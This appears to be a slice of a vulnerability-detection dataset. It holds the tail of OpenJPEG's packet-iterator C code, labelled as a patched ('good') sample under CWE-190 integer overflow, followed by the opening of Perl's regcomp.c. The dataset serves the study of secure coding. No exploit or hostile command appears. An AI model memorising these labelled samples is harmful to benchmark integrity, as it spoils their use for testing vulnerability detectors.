pi[pino].poc.tx1 = (OPJ_INT32)(tcp->tx0_t + tcp->dx - (tcp->tx0_t % tcp->dx));
pi[pino].poc.ty0 = (OPJ_INT32)tcp->ty0_t;
pi[pino].poc.ty1 = (OPJ_INT32)(tcp->ty0_t + tcp->dy - (tcp->ty0_t % tcp->dy));
tcp->tx0_t = (OPJ_UINT32)pi[pino].poc.tx1;
tcp->ty0_t = (OPJ_UINT32)pi[pino].poc.ty1;
break;
}
break;
}
}
incr_top=1;
}else{
for(i=tppos;i>=0;i--){
switch(prog[i]){
case 'C':
pi[pino].poc.compno0 = tcp->comp_t-1;
pi[pino].poc.compno1 = tcp->comp_t;
break;
case 'R':
pi[pino].poc.resno0 = tcp->res_t-1;
pi[pino].poc.resno1 = tcp->res_t;
break;
case 'L':
pi[pino].poc.layno0 = tcp->lay_t-1;
pi[pino].poc.layno1 = tcp->lay_t;
break;
case 'P':
switch(tcp->prg){
case OPJ_LRCP:
case OPJ_RLCP:
pi[pino].poc.precno0 = tcp->prc_t-1;
pi[pino].poc.precno1 = tcp->prc_t;
break;
default:
pi[pino].poc.tx0 = (OPJ_INT32)(tcp->tx0_t - tcp->dx - (tcp->tx0_t % tcp->dx));
pi[pino].poc.tx1 = (OPJ_INT32)tcp->tx0_t ;
pi[pino].poc.ty0 = (OPJ_INT32)(tcp->ty0_t - tcp->dy - (tcp->ty0_t % tcp->dy));
pi[pino].poc.ty1 = (OPJ_INT32)tcp->ty0_t ;
break;
}
break;
}
if(incr_top==1){
switch(prog[i]){
case 'R':
if(tcp->res_t==tcp->resE){
if(opj_pi_check_next_level(i-1,cp,tileno,pino,prog)){
tcp->res_t = tcp->resS;
pi[pino].poc.resno0 = tcp->res_t;
pi[pino].poc.resno1 = tcp->res_t+1;
tcp->res_t+=1;
incr_top=1;
}else{
incr_top=0;
}
}else{
pi[pino].poc.resno0 = tcp->res_t;
pi[pino].poc.resno1 = tcp->res_t+1;
tcp->res_t+=1;
incr_top=0;
}
break;
case 'C':
if(tcp->comp_t ==tcp->compE){
if(opj_pi_check_next_level(i-1,cp,tileno,pino,prog)){
tcp->comp_t = tcp->compS;
pi[pino].poc.compno0 = tcp->comp_t;
pi[pino].poc.compno1 = tcp->comp_t+1;
tcp->comp_t+=1;
incr_top=1;
}else{
incr_top=0;
}
}else{
pi[pino].poc.compno0 = tcp->comp_t;
pi[pino].poc.compno1 = tcp->comp_t+1;
tcp->comp_t+=1;
incr_top=0;
}
break;
case 'L':
if(tcp->lay_t == tcp->layE){
if(opj_pi_check_next_level(i-1,cp,tileno,pino,prog)){
tcp->lay_t = tcp->layS;
pi[pino].poc.layno0 = tcp->lay_t;
pi[pino].poc.layno1 = tcp->lay_t+1;
tcp->lay_t+=1;
incr_top=1;
}else{
incr_top=0;
}
}else{
pi[pino].poc.layno0 = tcp->lay_t;
pi[pino].poc.layno1 = tcp->lay_t+1;
tcp->lay_t+=1;
incr_top=0;
}
break;
case 'P':
switch(tcp->prg){
case OPJ_LRCP:
case OPJ_RLCP:
if(tcp->prc_t == tcp->prcE){
if(opj_pi_check_next_level(i-1,cp,tileno,pino,prog)){
tcp->prc_t = tcp->prcS;
pi[pino].poc.precno0 = tcp->prc_t;
pi[pino].poc.precno1 = tcp->prc_t+1;
tcp->prc_t+=1;
incr_top=1;
}else{
incr_top=0;
}
}else{
pi[pino].poc.precno0 = tcp->prc_t;
pi[pino].poc.precno1 = tcp->prc_t+1;
tcp->prc_t+=1;
incr_top=0;
}
break;
default:
if(tcp->tx0_t >= tcp->txE){
if(tcp->ty0_t >= tcp->tyE){
if(opj_pi_check_next_level(i-1,cp,tileno,pino,prog)){
tcp->ty0_t = tcp->tyS;
pi[pino].poc.ty0 = (OPJ_INT32)tcp->ty0_t;
pi[pino].poc.ty1 = (OPJ_INT32)(tcp->ty0_t + tcp->dy - (tcp->ty0_t % tcp->dy));
tcp->ty0_t = (OPJ_UINT32)pi[pino].poc.ty1;
incr_top=1;resetX=1;
}else{
incr_top=0;resetX=0;
}
}else{
pi[pino].poc.ty0 = (OPJ_INT32)tcp->ty0_t;
pi[pino].poc.ty1 = (OPJ_INT32)(tcp->ty0_t + tcp->dy - (tcp->ty0_t % tcp->dy));
tcp->ty0_t = (OPJ_UINT32)pi[pino].poc.ty1;
incr_top=0;resetX=1;
}
if(resetX==1){
tcp->tx0_t = tcp->txS;
pi[pino].poc.tx0 = (OPJ_INT32)tcp->tx0_t;
pi[pino].poc.tx1 = (OPJ_INT32)(tcp->tx0_t + tcp->dx- (tcp->tx0_t % tcp->dx));
tcp->tx0_t = (OPJ_UINT32)pi[pino].poc.tx1;
}
}else{
pi[pino].poc.tx0 = (OPJ_INT32)tcp->tx0_t;
pi[pino].poc.tx1 = (OPJ_INT32)(tcp->tx0_t + tcp->dx- (tcp->tx0_t % tcp->dx));
tcp->tx0_t = (OPJ_UINT32)pi[pino].poc.tx1;
incr_top=0;
}
break;
}
break;
}
}
}
}
}
}
void opj_pi_destroy(opj_pi_iterator_t *p_pi,
OPJ_UINT32 p_nb_elements)
{
OPJ_UINT32 compno, pino;
opj_pi_iterator_t *l_current_pi = p_pi;
if (p_pi) {
if (p_pi->include) {
opj_free(p_pi->include);
p_pi->include = 00;
}
for (pino = 0; pino < p_nb_elements; ++pino){
if(l_current_pi->comps) {
opj_pi_comp_t *l_current_component = l_current_pi->comps;
for (compno = 0; compno < l_current_pi->numcomps; compno++){
if(l_current_component->resolutions) {
opj_free(l_current_component->resolutions);
l_current_component->resolutions = 00;
}
++l_current_component;
}
opj_free(l_current_pi->comps);
l_current_pi->comps = 0;
}
++l_current_pi;
}
opj_free(p_pi);
}
}
void opj_pi_update_encoding_parameters( const opj_image_t *p_image,
opj_cp_t *p_cp,
OPJ_UINT32 p_tile_no )
{
/* encoding parameters to set */
OPJ_UINT32 l_max_res;
OPJ_UINT32 l_max_prec;
OPJ_INT32 l_tx0,l_tx1,l_ty0,l_ty1;
OPJ_UINT32 l_dx_min,l_dy_min;
/* pointers */
opj_tcp_t *l_tcp = 00;
/* preconditions */
assert(p_cp != 00);
assert(p_image != 00);
assert(p_tile_no < p_cp->tw * p_cp->th);
l_tcp = &(p_cp->tcps[p_tile_no]);
/* get encoding parameters */
opj_get_encoding_parameters(p_image,p_cp,p_tile_no,&l_tx0,&l_tx1,&l_ty0,&l_ty1,&l_dx_min,&l_dy_min,&l_max_prec,&l_max_res);
if (l_tcp->POC) {
opj_pi_update_encode_poc_and_final(p_cp,p_tile_no,l_tx0,l_tx1,l_ty0,l_ty1,l_max_prec,l_max_res,l_dx_min,l_dy_min);
}
else {
opj_pi_update_encode_not_poc(p_cp,p_image->numcomps,p_tile_no,l_tx0,l_tx1,l_ty0,l_ty1,l_max_prec,l_max_res,l_dx_min,l_dy_min);
}
}
OPJ_BOOL opj_pi_next(opj_pi_iterator_t * pi) {
switch (pi->poc.prg) {
case OPJ_LRCP:
return opj_pi_next_lrcp(pi);
case OPJ_RLCP:
return opj_pi_next_rlcp(pi);
case OPJ_RPCL:
return opj_pi_next_rpcl(pi);
case OPJ_PCRL:
return opj_pi_next_pcrl(pi);
case OPJ_CPRL:
return opj_pi_next_cprl(pi);
case OPJ_PROG_UNKNOWN:
return OPJ_FALSE;
}
return OPJ_FALSE;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_540_0 |
crossvul-cpp_data_good_3885_3 | /* regcomp.c
*/
/*
* 'A fair jaw-cracker dwarf-language must be.' --Samwise Gamgee
*
* [p.285 of _The Lord of the Rings_, II/iii: "The Ring Goes South"]
*/
/* This file contains functions for compiling a regular expression. See
 * also regexec.c which, funnily enough, contains functions for executing
* a regular expression.
*
* This file is also copied at build time to ext/re/re_comp.c, where
* it's built with -DPERL_EXT_RE_BUILD -DPERL_EXT_RE_DEBUG -DPERL_EXT.
* This causes the main functions to be compiled under new names and with
* debugging support added, which makes "use re 'debug'" work.
*/
/* NOTE: this is derived from Henry Spencer's regexp code, and should not
 * be confused with the original package (see point 3 below). Thanks, Henry!
*/
/* Additional note: this code is very heavily munged from Henry's version
* in places. In some spots I've traded clarity for efficiency, so don't
* blame Henry for some of the lack of readability.
*/
/* The names of the functions have been changed from regcomp and
* regexec to pregcomp and pregexec in order to avoid conflicts
* with the POSIX routines of the same names.
*/
#ifdef PERL_EXT_RE_BUILD
#include "re_top.h"
#endif
/*
* pregcomp and pregexec -- regsub and regerror are not used in perl
*
* Copyright (c) 1986 by University of Toronto.
* Written by Henry Spencer. Not derived from licensed software.
*
* Permission is granted to anyone to use this software for any
* purpose on any computer system, and to redistribute it freely,
* subject to the following restrictions:
*
* 1. The author is not responsible for the consequences of use of
* this software, no matter how awful, even if they arise
* from defects in it.
*
* 2. The origin of this software must not be misrepresented, either
* by explicit claim or by omission.
*
* 3. Altered versions must be plainly marked as such, and must not
* be misrepresented as being the original software.
*
*
**** Alterations to Henry's code are...
****
**** Copyright (C) 1991, 1992, 1993, 1994, 1995, 1996, 1997, 1998, 1999,
**** 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008
**** by Larry Wall and others
****
**** You may distribute under the terms of either the GNU General Public
**** License or the Artistic License, as specified in the README file.
*
* Beware that some of this code is subtly aware of the way operator
* precedence is structured in regular expressions. Serious changes in
* regular-expression syntax might require a total rethink.
*/
#include "EXTERN.h"
#define PERL_IN_REGCOMP_C
#include "perl.h"
#define REG_COMP_C
#ifdef PERL_IN_XSUB_RE
# include "re_comp.h"
EXTERN_C const struct regexp_engine my_reg_engine;
#else
# include "regcomp.h"
#endif
#include "dquote_inline.h"
#include "invlist_inline.h"
#include "unicode_constants.h"
#define HAS_NONLATIN1_FOLD_CLOSURE(i) \
_HAS_NONLATIN1_FOLD_CLOSURE_ONLY_FOR_USE_BY_REGCOMP_DOT_C_AND_REGEXEC_DOT_C(i)
#define HAS_NONLATIN1_SIMPLE_FOLD_CLOSURE(i) \
_HAS_NONLATIN1_SIMPLE_FOLD_CLOSURE_ONLY_FOR_USE_BY_REGCOMP_DOT_C_AND_REGEXEC_DOT_C(i)
#define IS_NON_FINAL_FOLD(c) _IS_NON_FINAL_FOLD_ONLY_FOR_USE_BY_REGCOMP_DOT_C(c)
#define IS_IN_SOME_FOLD_L1(c) _IS_IN_SOME_FOLD_ONLY_FOR_USE_BY_REGCOMP_DOT_C(c)
#ifndef STATIC
#define STATIC static
#endif
/* this is a chain of data about sub patterns we are processing that
need to be handled separately/specially in study_chunk. It's so
we can simulate recursion without losing state. */
struct scan_frame;
typedef struct scan_frame {
regnode *last_regnode; /* last node to process in this frame */
regnode *next_regnode; /* next node to process when last is reached */
U32 prev_recursed_depth;
I32 stopparen; /* what stopparen do we use */
struct scan_frame *this_prev_frame; /* this previous frame */
struct scan_frame *prev_frame; /* previous frame */
struct scan_frame *next_frame; /* next frame */
} scan_frame;
/* Certain characters are output as a sequence with the first being a
* backslash. */
#define isBACKSLASHED_PUNCT(c) strchr("-[]\\^", c)
struct RExC_state_t {
U32 flags; /* RXf_* are we folding, multilining? */
U32 pm_flags; /* PMf_* stuff from the calling PMOP */
char *precomp; /* uncompiled string. */
char *precomp_end; /* pointer to end of uncompiled string. */
REGEXP *rx_sv; /* The SV that is the regexp. */
regexp *rx; /* perl core regexp structure */
regexp_internal *rxi; /* internal data for regexp object
pprivate field */
char *start; /* Start of input for compile */
char *end; /* End of input for compile */
char *parse; /* Input-scan pointer. */
char *copy_start; /* start of copy of input within
constructed parse string */
char *save_copy_start; /* Provides one level of saving
and restoring 'copy_start' */
char *copy_start_in_input; /* Position in input string
corresponding to copy_start */
SSize_t whilem_seen; /* number of WHILEM in this expr */
regnode *emit_start; /* Start of emitted-code area */
regnode_offset emit; /* Code-emit pointer */
I32 naughty; /* How bad is this pattern? */
I32 sawback; /* Did we see \1, ...? */
U32 seen;
SSize_t size; /* Number of regnode equivalents in
pattern */
/* position beyond 'precomp' of the warning message furthest away from
* 'precomp'. During the parse, no warnings are raised for any problems
* earlier in the parse than this position. This works if warnings are
* raised the first time a given spot is parsed, and if only one
* independent warning is raised for any given spot */
Size_t latest_warn_offset;
I32 npar; /* Capture buffer count so far in the
parse, (OPEN) plus one. ("par" 0 is
the whole pattern)*/
I32 total_par; /* During initial parse, is either 0,
or -1; the latter indicating a
reparse is needed. After that pass,
it is what 'npar' became after the
pass. Hence, it being > 0 indicates
we are in a reparse situation */
I32 nestroot; /* root parens we are in - used by
accept */
I32 seen_zerolen;
regnode_offset *open_parens; /* offsets to open parens */
regnode_offset *close_parens; /* offsets to close parens */
I32 parens_buf_size; /* #slots malloced open/close_parens */
regnode *end_op; /* END node in program */
I32 utf8; /* whether the pattern is utf8 or not */
I32 orig_utf8; /* whether the pattern was originally in utf8 */
/* XXX use this for future optimisation of case
* where pattern must be upgraded to utf8. */
I32 uni_semantics; /* If a d charset modifier should use unicode
rules, even if the pattern is not in
utf8 */
HV *paren_names; /* Paren names */
regnode **recurse; /* Recurse regops */
I32 recurse_count; /* Number of recurse regops we have generated */
U8 *study_chunk_recursed; /* bitmap of which subs we have moved
through */
U32 study_chunk_recursed_bytes; /* bytes in bitmap */
I32 in_lookbehind;
I32 contains_locale;
I32 override_recoding;
#ifdef EBCDIC
I32 recode_x_to_native;
#endif
I32 in_multi_char_class;
struct reg_code_blocks *code_blocks;/* positions of literal (?{})
within pattern */
int code_index; /* next code_blocks[] slot */
SSize_t maxlen; /* minimum possible number of chars in string to match */
scan_frame *frame_head;
scan_frame *frame_last;
U32 frame_count;
AV *warn_text;
HV *unlexed_names;
#ifdef ADD_TO_REGEXEC
char *starttry; /* -Dr: where regtry was called. */
#define RExC_starttry (pRExC_state->starttry)
#endif
SV *runtime_code_qr; /* qr with the runtime code blocks */
#ifdef DEBUGGING
const char *lastparse;
I32 lastnum;
AV *paren_name_list; /* idx -> name */
U32 study_chunk_recursed_count;
SV *mysv1;
SV *mysv2;
#define RExC_lastparse (pRExC_state->lastparse)
#define RExC_lastnum (pRExC_state->lastnum)
#define RExC_paren_name_list (pRExC_state->paren_name_list)
#define RExC_study_chunk_recursed_count (pRExC_state->study_chunk_recursed_count)
#define RExC_mysv (pRExC_state->mysv1)
#define RExC_mysv1 (pRExC_state->mysv1)
#define RExC_mysv2 (pRExC_state->mysv2)
#endif
bool seen_d_op;
bool strict;
bool study_started;
bool in_script_run;
bool use_BRANCHJ;
};
#define RExC_flags (pRExC_state->flags)
#define RExC_pm_flags (pRExC_state->pm_flags)
#define RExC_precomp (pRExC_state->precomp)
#define RExC_copy_start_in_input (pRExC_state->copy_start_in_input)
#define RExC_copy_start_in_constructed (pRExC_state->copy_start)
#define RExC_save_copy_start_in_constructed (pRExC_state->save_copy_start)
#define RExC_precomp_end (pRExC_state->precomp_end)
#define RExC_rx_sv (pRExC_state->rx_sv)
#define RExC_rx (pRExC_state->rx)
#define RExC_rxi (pRExC_state->rxi)
#define RExC_start (pRExC_state->start)
#define RExC_end (pRExC_state->end)
#define RExC_parse (pRExC_state->parse)
#define RExC_latest_warn_offset (pRExC_state->latest_warn_offset )
#define RExC_whilem_seen (pRExC_state->whilem_seen)
#define RExC_seen_d_op (pRExC_state->seen_d_op) /* Seen something that differs
under /d from /u ? */
#ifdef RE_TRACK_PATTERN_OFFSETS
# define RExC_offsets (RExC_rxi->u.offsets) /* I am not like the
others */
#endif
#define RExC_emit (pRExC_state->emit)
#define RExC_emit_start (pRExC_state->emit_start)
#define RExC_sawback (pRExC_state->sawback)
#define RExC_seen (pRExC_state->seen)
#define RExC_size (pRExC_state->size)
#define RExC_maxlen (pRExC_state->maxlen)
#define RExC_npar (pRExC_state->npar)
#define RExC_total_parens (pRExC_state->total_par)
#define RExC_parens_buf_size (pRExC_state->parens_buf_size)
#define RExC_nestroot (pRExC_state->nestroot)
#define RExC_seen_zerolen (pRExC_state->seen_zerolen)
#define RExC_utf8 (pRExC_state->utf8)
#define RExC_uni_semantics (pRExC_state->uni_semantics)
#define RExC_orig_utf8 (pRExC_state->orig_utf8)
#define RExC_open_parens (pRExC_state->open_parens)
#define RExC_close_parens (pRExC_state->close_parens)
#define RExC_end_op (pRExC_state->end_op)
#define RExC_paren_names (pRExC_state->paren_names)
#define RExC_recurse (pRExC_state->recurse)
#define RExC_recurse_count (pRExC_state->recurse_count)
#define RExC_study_chunk_recursed (pRExC_state->study_chunk_recursed)
#define RExC_study_chunk_recursed_bytes \
(pRExC_state->study_chunk_recursed_bytes)
#define RExC_in_lookbehind (pRExC_state->in_lookbehind)
#define RExC_contains_locale (pRExC_state->contains_locale)
#ifdef EBCDIC
# define RExC_recode_x_to_native (pRExC_state->recode_x_to_native)
#endif
#define RExC_in_multi_char_class (pRExC_state->in_multi_char_class)
#define RExC_frame_head (pRExC_state->frame_head)
#define RExC_frame_last (pRExC_state->frame_last)
#define RExC_frame_count (pRExC_state->frame_count)
#define RExC_strict (pRExC_state->strict)
#define RExC_study_started (pRExC_state->study_started)
#define RExC_warn_text (pRExC_state->warn_text)
#define RExC_in_script_run (pRExC_state->in_script_run)
#define RExC_use_BRANCHJ (pRExC_state->use_BRANCHJ)
#define RExC_unlexed_names (pRExC_state->unlexed_names)
/* Heuristic check on the complexity of the pattern: if TOO_NAUGHTY, we set
* a flag to disable back-off on the fixed/floating substrings - if it's
* a high complexity pattern we assume the benefit of avoiding a full match
* is worth the cost of checking for the substrings even if they rarely help.
*/
#define RExC_naughty (pRExC_state->naughty)
#define TOO_NAUGHTY (10)
#define MARK_NAUGHTY(add) \
if (RExC_naughty < TOO_NAUGHTY) \
RExC_naughty += (add)
#define MARK_NAUGHTY_EXP(exp, add) \
if (RExC_naughty < TOO_NAUGHTY) \
RExC_naughty += RExC_naughty / (exp) + (add)
#define ISMULT1(c) ((c) == '*' || (c) == '+' || (c) == '?')
#define ISMULT2(s) ((*s) == '*' || (*s) == '+' || (*s) == '?' || \
((*s) == '{' && regcurly(s)))
/*
* Flags to be passed up and down.
*/
#define WORST 0 /* Worst case. */
#define HASWIDTH 0x01 /* Known to not match null strings, could match
non-null ones. */
/* Simple enough to be STAR/PLUS operand; in an EXACTish node must be a single
* character. (There needs to be a case: in the switch statement in regexec.c
* for any node marked SIMPLE.) Note that this is not the same thing as
* REGNODE_SIMPLE */
#define SIMPLE 0x02
#define SPSTART 0x04 /* Starts with * or + */
#define POSTPONED 0x08 /* (?1),(?&name), (??{...}) or similar */
#define TRYAGAIN 0x10 /* Weeded out a declaration. */
#define RESTART_PARSE 0x20 /* Need to redo the parse */
#define NEED_UTF8 0x40 /* In conjunction with RESTART_PARSE, need to
calculate sizes as UTF-8 */
#define REG_NODE_NUM(x) ((x) ? (int)((x)-RExC_emit_start) : -1)
/* whether trie related optimizations are enabled */
#if PERL_ENABLE_EXTENDED_TRIE_OPTIMISATION
#define TRIE_STUDY_OPT
#define FULL_TRIE_STUDY
#define TRIE_STCLASS
#endif
#define PBYTE(u8str,paren) ((U8*)(u8str))[(paren) >> 3]
#define PBITVAL(paren) (1 << ((paren) & 7))
#define PAREN_TEST(u8str,paren) ( PBYTE(u8str,paren) & PBITVAL(paren))
#define PAREN_SET(u8str,paren) PBYTE(u8str,paren) |= PBITVAL(paren)
#define PAREN_UNSET(u8str,paren) PBYTE(u8str,paren) &= (~PBITVAL(paren))
#define REQUIRE_UTF8(flagp) STMT_START { \
if (!UTF) { \
*flagp = RESTART_PARSE|NEED_UTF8; \
return 0; \
} \
} STMT_END
/* Change from /d into /u rules, and restart the parse. RExC_uni_semantics is
* a flag that indicates we need to override /d with /u as a result of
* something in the pattern. It should only be used in regards to calling
 * set_regex_charset() or get_regex_charset() */
#define REQUIRE_UNI_RULES(flagp, restart_retval) \
STMT_START { \
if (DEPENDS_SEMANTICS) { \
set_regex_charset(&RExC_flags, REGEX_UNICODE_CHARSET); \
RExC_uni_semantics = 1; \
if (RExC_seen_d_op && LIKELY(! IN_PARENS_PASS)) { \
/* No need to restart the parse if we haven't seen \
* anything that differs between /u and /d, and no need \
* to restart immediately if we're going to reparse \
* anyway to count parens */ \
*flagp |= RESTART_PARSE; \
return restart_retval; \
} \
} \
} STMT_END
#define REQUIRE_BRANCHJ(flagp, restart_retval) \
STMT_START { \
RExC_use_BRANCHJ = 1; \
*flagp |= RESTART_PARSE; \
return restart_retval; \
} STMT_END
/* Until we have completed the parse, we leave RExC_total_parens at 0 or
* less. After that, it must always be positive, because the whole re is
* considered to be surrounded by virtual parens. Setting it to negative
* indicates there is some construct that needs to know the actual number of
* parens to be properly handled. And that means an extra pass will be
* required after we've counted them all */
#define ALL_PARENS_COUNTED (RExC_total_parens > 0)
#define REQUIRE_PARENS_PASS \
STMT_START { /* No-op if have completed a pass */ \
if (! ALL_PARENS_COUNTED) RExC_total_parens = -1; \
} STMT_END
#define IN_PARENS_PASS (RExC_total_parens < 0)
/* This is used to return failure (zero) early from the calling function if
* various flags in 'flags' are set. Two flags always cause a return:
* 'RESTART_PARSE' and 'NEED_UTF8'. 'extra' can be used to specify any
* additional flags that should cause a return; 0 if none. If the return will
* be done, '*flagp' is first set to be all of the flags that caused the
* return. */
#define RETURN_FAIL_ON_RESTART_OR_FLAGS(flags,flagp,extra) \
STMT_START { \
if ((flags) & (RESTART_PARSE|NEED_UTF8|(extra))) { \
*(flagp) = (flags) & (RESTART_PARSE|NEED_UTF8|(extra)); \
return 0; \
} \
} STMT_END
#define MUST_RESTART(flags) ((flags) & (RESTART_PARSE))
#define RETURN_FAIL_ON_RESTART(flags,flagp) \
RETURN_FAIL_ON_RESTART_OR_FLAGS( flags, flagp, 0)
#define RETURN_FAIL_ON_RESTART_FLAGP(flagp) \
if (MUST_RESTART(*(flagp))) return 0
/* This converts the named class defined in regcomp.h to its equivalent class
* number defined in handy.h. */
#define namedclass_to_classnum(class) ((int) ((class) / 2))
#define classnum_to_namedclass(classnum) ((classnum) * 2)
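/* e.g. named-class values 6 and 7 both collapse to class number 3 under the
 * division above (the named classes are laid out in complement pairs in
 * regcomp.h). */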
#define _invlist_union_complement_2nd(a, b, output) \
_invlist_union_maybe_complement_2nd(a, b, TRUE, output)
#define _invlist_intersection_complement_2nd(a, b, output) \
_invlist_intersection_maybe_complement_2nd(a, b, TRUE, output)
/* About scan_data_t.
During optimisation we recurse through the regexp program performing
various inplace (keyhole style) optimisations. In addition study_chunk
and scan_commit populate this data structure with information about
what strings MUST appear in the pattern. We look for the longest
string that must appear at a fixed location, and we look for the
longest string that may appear at a floating location. So for instance
in the pattern:
/FOO[xX]A.*B[xX]BAR/
Both 'FOO' and 'A' are fixed strings. Both 'B' and 'BAR' are floating
strings (because they follow a .* construct). study_chunk will identify
both FOO and BAR as being the longest fixed and floating strings respectively.
The strings can be composites, for instance
/(f)(o)(o)/
will result in a composite fixed substring 'foo'.
For each string some basic information is maintained:
- min_offset
This is the position the string must appear at, or not before.
It also implicitly (when combined with minlenp) tells us how many
characters must match before the string we are searching for.
Likewise when combined with minlenp and the length of the string it
tells us how many characters must appear after the string we have
found.
- max_offset
Only used for floating strings. This is the rightmost point that
the string can appear at. If set to SSize_t_MAX it indicates that the
string can occur infinitely far to the right.
For fixed strings, it is equal to min_offset.
- minlenp
A pointer to the minimum number of characters of the pattern that the
string was found inside. This is important as in the case of positive
lookahead or positive lookbehind we can have multiple patterns
involved. Consider
/(?=FOO).*F/
The minimum length of the pattern overall is 3, the minimum length
of the lookahead part is 3, but the minimum length of the part that
will actually match is 1. So 'FOO's minimum length is 3, but the
minimum length for the F is 1. This is important as the minimum length
is used to determine offsets in front of and behind the string being
looked for. Since strings can be composites this is the length of the
pattern at the time it was committed with a scan_commit. Note that
the length is calculated by study_chunk, so that the minimum lengths
are not known until the full pattern has been compiled, thus the
pointer to the value.
- lookbehind
In the case of lookbehind the string being searched for can be
offset past the start point of the final matching string.
If this value was just blithely removed from the min_offset it would
invalidate some of the calculations for how many chars must match
before or after (as they are derived from min_offset and minlen and
the length of the string being searched for).
When the final pattern is compiled and the data is moved from the
scan_data_t structure into the regexp structure the information
about lookbehind is factored in, with the information that would
have been lost precalculated in the end_shift field for the
associated string.
The fields pos_min and pos_delta are used to store the minimum offset
and the delta to the maximum offset at the current point in the pattern.
*/
struct scan_data_substrs {
SV *str; /* longest substring found in pattern */
SSize_t min_offset; /* earliest point in string it can appear */
SSize_t max_offset; /* latest point in string it can appear */
SSize_t *minlenp; /* pointer to the minlen relevant to the string */
SSize_t lookbehind; /* is the pos of the string modified by LB */
I32 flags; /* per substring SF_* and SCF_* flags */
};
typedef struct scan_data_t {
/*I32 len_min; unused */
/*I32 len_delta; unused */
SSize_t pos_min;
SSize_t pos_delta;
SV *last_found;
SSize_t last_end; /* min value, <0 unless valid. */
SSize_t last_start_min;
SSize_t last_start_max;
U8 cur_is_floating; /* whether the last_* values should be set as
* the next fixed (0) or floating (1)
* substring */
/* [0] is longest fixed substring so far, [1] is longest float so far */
struct scan_data_substrs substrs[2];
I32 flags; /* common SF_* and SCF_* flags */
I32 whilem_c;
SSize_t *last_closep;
regnode_ssc *start_class;
} scan_data_t;
/*
* Forward declarations for pregcomp()'s friends.
*/
static const scan_data_t zero_scan_data = {
0, 0, NULL, 0, 0, 0, 0,
{
{ NULL, 0, 0, 0, 0, 0 },
{ NULL, 0, 0, 0, 0, 0 },
},
0, 0, NULL, NULL
};
/* study flags */
#define SF_BEFORE_SEOL 0x0001
#define SF_BEFORE_MEOL 0x0002
#define SF_BEFORE_EOL (SF_BEFORE_SEOL|SF_BEFORE_MEOL)
#define SF_IS_INF 0x0040
#define SF_HAS_PAR 0x0080
#define SF_IN_PAR 0x0100
#define SF_HAS_EVAL 0x0200
/* SCF_DO_SUBSTR is the flag that tells the regexp analyzer to track the
* longest substring in the pattern. When it is not set the optimiser keeps
* track of position, but does not keep track of the actual strings seen,
*
* So for instance /foo/ will be parsed with SCF_DO_SUBSTR being true, but
* /foo/i will not.
*
* Similarly, /foo.*(blah|erm|huh).*fnorble/ will have "foo" and "fnorble"
* parsed with SCF_DO_SUBSTR on, but while processing the (...) it will be
* turned off because of the alternation (BRANCH). */
#define SCF_DO_SUBSTR 0x0400
#define SCF_DO_STCLASS_AND 0x0800
#define SCF_DO_STCLASS_OR 0x1000
#define SCF_DO_STCLASS (SCF_DO_STCLASS_AND|SCF_DO_STCLASS_OR)
#define SCF_WHILEM_VISITED_POS 0x2000
#define SCF_TRIE_RESTUDY 0x4000 /* Do restudy? */
#define SCF_SEEN_ACCEPT 0x8000
#define SCF_TRIE_DOING_RESTUDY 0x10000
#define SCF_IN_DEFINE 0x20000
#define UTF cBOOL(RExC_utf8)
/* The enums for all these are ordered so things work out correctly */
#define LOC (get_regex_charset(RExC_flags) == REGEX_LOCALE_CHARSET)
#define DEPENDS_SEMANTICS (get_regex_charset(RExC_flags) \
== REGEX_DEPENDS_CHARSET)
#define UNI_SEMANTICS (get_regex_charset(RExC_flags) == REGEX_UNICODE_CHARSET)
#define AT_LEAST_UNI_SEMANTICS (get_regex_charset(RExC_flags) \
>= REGEX_UNICODE_CHARSET)
#define ASCII_RESTRICTED (get_regex_charset(RExC_flags) \
== REGEX_ASCII_RESTRICTED_CHARSET)
#define AT_LEAST_ASCII_RESTRICTED (get_regex_charset(RExC_flags) \
>= REGEX_ASCII_RESTRICTED_CHARSET)
#define ASCII_FOLD_RESTRICTED (get_regex_charset(RExC_flags) \
== REGEX_ASCII_MORE_RESTRICTED_CHARSET)
#define FOLD cBOOL(RExC_flags & RXf_PMf_FOLD)
/* For programs that want to be strictly Unicode compatible by dying if any
* attempt is made to match a non-Unicode code point against a Unicode
* property. */
#define ALWAYS_WARN_SUPER ckDEAD(packWARN(WARN_NON_UNICODE))
#define OOB_NAMEDCLASS -1
/* There is no code point that is out-of-bounds, so this is problematic. But
 * its only current use is to initialize a variable that is always set before
 * it is looked at. */
#define OOB_UNICODE 0xDEADBEEF
#define CHR_SVLEN(sv) (UTF ? sv_len_utf8(sv) : SvCUR(sv))
/* length of regex to show in messages that don't mark a position within */
#define RegexLengthToShowInErrorMessages 127
/*
* If MARKER[12] are adjusted, be sure to adjust the constants at the top
* of t/op/regmesg.t, the tests in t/op/re_tests, and those in
* op/pragma/warn/regcomp.
*/
#define MARKER1 "<-- HERE" /* marker as it appears in the description */
#define MARKER2 " <-- HERE " /* marker as it appears within the regex */
#define REPORT_LOCATION " in regex; marked by " MARKER1 \
" in m/%" UTF8f MARKER2 "%" UTF8f "/"
/* The code in this file in places uses one level of recursion with parsing
* rebased to an alternate string constructed by us in memory. This can take
* the form of something that is completely different from the input, or
* something that uses the input as part of the alternate. In the first case,
* there should be no possibility of an error, as we are in complete control of
* the alternate string. But in the second case we don't completely control
* the input portion, so there may be errors in that. Here's an example:
* /[abc\x{DF}def]/ui
* is handled specially because \x{df} folds to a sequence of more than one
* character: 'ss'. What is done is to create and parse an alternate string,
* which looks like this:
* /(?:\x{DF}|[abc\x{DF}def])/ui
* where it uses the input unchanged in the middle of something it constructs,
* which is a branch for the DF outside the character class, and clustering
* parens around the whole thing. (It knows enough to skip the DF inside the
* class while in this substitute parse.) 'abc' and 'def' may have errors that
* need to be reported. The general situation looks like this:
*
* |<------- identical ------>|
* sI tI xI eI
* Input: ---------------------------------------------------------------
* Constructed: ---------------------------------------------------
* sC tC xC eC EC
* |<------- identical ------>|
*
* sI..eI is the portion of the input pattern we are concerned with here.
* sC..EC is the constructed substitute parse string.
* sC..tC is constructed by us
* tC..eC is an exact duplicate of the portion of the input pattern tI..eI.
* In the diagram, these are vertically aligned.
* eC..EC is also constructed by us.
* xC is the position in the substitute parse string where we found a
* problem.
* xI is the position in the original pattern corresponding to xC.
*
* We want to display a message showing the real input string. Thus we need to
* translate from xC to xI. We know that xC >= tC, since the portion of the
* string sC..tC has been constructed by us, and so shouldn't have errors. We
* get:
